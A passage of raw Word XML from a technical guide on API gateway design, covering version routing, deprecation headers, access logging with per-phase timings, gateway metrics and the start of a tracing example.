    <w:p w14:paraId="51657DDD" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Query parameter versioning:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D9A6E89" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="688F6325" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>/payments?version=2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FDB796D" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>Easy to test, visible in logs. Feels "hacky" to some API designers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01CE3586" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The gateway's role:</w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:t> The gateway translates the client's version indication (URL, header, or query param) into routing to the appropriate backend cluster. Version routing logic is centralized in the gateway — backends don't need to implement versioning logic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EE810DF" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sunset headers for deprecation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07DC27E3" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23F2F706" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>Sunset: Sat, 31 Dec 2024 23:59:59 GMT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AFB6690" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>Deprecation: Mon, 01 Jan 2024 00:00:00 GMT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="599A83CB" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>Link: &lt;https://api.example.com/v2/payments&gt;; rel="successor-version"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17BEE8A7" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>The gateway automatically adds these headers to responses for deprecated API versions — informing clients about the deprecation timeline and migration path without changing the backend's response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11F00358" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:pict w14:anchorId="651E7603">
          <v:rect id="_x0000_i3831" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FBD150B" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>8. Observability at the Gateway Layer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53DD2B2D" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Access Logging — The Complete Request Record</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66CE3191" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>The gateway produces the most complete request log in the system — it sees both the client request and the backend response, with timing for every phase:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F5067D0" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:lastRenderedPageBreak/>
        <w:t>JSON</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AAB4BC4" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38865055" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">  "timestamp": "2024-01-15T10:30:45.123Z",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C49437" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">  "request_id": "a7f3c2d1-4e5b-6c7d",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7776B275" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">  "client_ip": "203.0.113.1",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FA9205A" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">  "method": "POST",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="364ADB43" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">  "host": "api.example.com",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70CA6683" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">  "path": "/v2/payments",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FCBB33E" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">  "status": 201,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64A80A8B" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">  "user_id": "user123",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA9591B" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">  "api_key": "key_abc***",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04CC15C9" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">  "tenant_id": "tenant456",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="246C839B" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7201A500" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">  "timings": {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4423ED15" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">    "auth_ms": 2.3,           // JWT validation time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="314B10AD" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">    "rate_limit_ms": 0.8,     // Redis rate limit check</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27CB92B8" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">    "route_match_ms": 0.1,    // Route resolution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47C85677" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">    "upstream_connect_ms": 0.5, // Backend connection acquisition</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BA9E0DB" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">    "upstream_ttfb_ms": 142,  // Time to first byte from backend</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F24124A" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">    "upstream_total_ms": 148, // Total backend response time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55DE8DE7" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">    "total_ms": 152           // Total gateway processing time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F6BBD8" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">  },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75914101" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6077C703" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">  "upstream": {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E1A9D79" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">    "host": "payment-service-v2",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E180D91" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">    "instance": "10.0.1.5:8080",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BCD28A6" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    "attempts": 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="189D5242" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">  },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66695B4E" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E0BB6A" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">  "rate_limit": {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3282C9EB" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">    "limit": 100,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E891250" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">    "remaining": 43,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B906E03" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">    "reset_at": "2024-01-15T10:31:00Z"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED958F4" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">  },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7336901C" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F436B99" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">  "cache": {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="288395F0" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">    "status": "MISS"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B1BEB5B" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5920F3B9" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6032EF19" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>The timings breakdown is critical for debugging — it reveals exactly where time is spent. auth_ms: 2.3 is fast (in-memory JWT validation). upstream_ttfb_ms: 142 reveals the backend is slow. Without per-phase timing, you'd only see total_ms: 152 and wouldn't know whether the latency is gateway overhead or backend processing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D0B8BB1" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Metrics Emission</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EFAD792" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>The gateway emits metrics for every request. Key metrics per route:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="582CE6D0" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Request metrics:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D9F8D2F" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="861"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00563018">
        <w:t>gateway_requests_total{route, method, status_code} — request count, breakdown by status.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CF812D2" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="861"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00563018">
        <w:t>gateway_request_duration_seconds{route, quantile} — latency distribution (p50, p95, p99).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53F6FED2" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="861"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00563018">
        <w:t>gateway_request_size_bytes{route} — request body size distribution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="459A93EF" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="861"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00563018">
        <w:t>gateway_response_size_bytes{route} — response body size distribution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="562A02E7" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Backend metrics:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24BE31E9" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="862"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00563018">
        <w:lastRenderedPageBreak/>
        <w:t>gateway_upstream_request_duration_seconds{service, instance} — backend latency per instance. Identify slow instances.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F8D70E4" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="862"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00563018">
        <w:t>gateway_upstream_requests_total{service, instance, status} — backend request count with status.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6030ABF9" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="862"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00563018">
        <w:t>gateway_upstream_connection_pool_active{service} — active backend connections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="464264CB" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="862"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00563018">
        <w:t>gateway_upstream_circuit_breaker_state{service} — 0=closed, 1=half-open, 2=open.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C21AAD1" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Rate limiting metrics:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A3036C" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="863"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00563018">
        <w:t>gateway_ratelimit_requests_total{key_type, allowed} — rate limit check outcomes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C70480" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="863"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00563018">
        <w:t>gateway_ratelimit_rejected_total{route, tenant} — rejected requests (for alerting on legitimate traffic rejection).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18047A2B" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Authentication metrics:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ECF8B06" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="864"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00563018">
        <w:t>gateway_auth_duration_seconds{method} — JWT validation, API key lookup latency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B15695A" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="864"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00563018">
        <w:t>gateway_auth_failures_total{reason} — expired tokens, invalid signatures, missing credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F778B6A" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Distributed Tracing Integration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="282C6D1A" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>The gateway creates a </w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>root span</w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:t> for every request (if no incoming trace context) or a </w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>child span</w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:t> (if the client sent a trace context header):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B624135" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="136C6207" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>Client (no trace context) → Gateway creates root span</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FF95CDE" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">  Gateway span: {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C6C7E93" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">    trace_id: "4bf92f3577b34da6a3ce929d0e0e4736",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4940A3A5" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">    span_id: "00f067aa0ba902b7",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD2CD67" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">    start: T0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="651EC7CD" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">    end: T0+152ms,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68E3E613" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">    tags: {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09FE689B" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">      http.method: POST,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FFFC5E4" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">      http.url: /v2/payments,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1257B5E4" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">      http.status_code: 201,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49E99B42" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">      peer.service: payment-service-v2,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F60BFE" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">      auth.user_id: user123</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7736E104" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F635D2D" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71FA5199" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B195B03" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
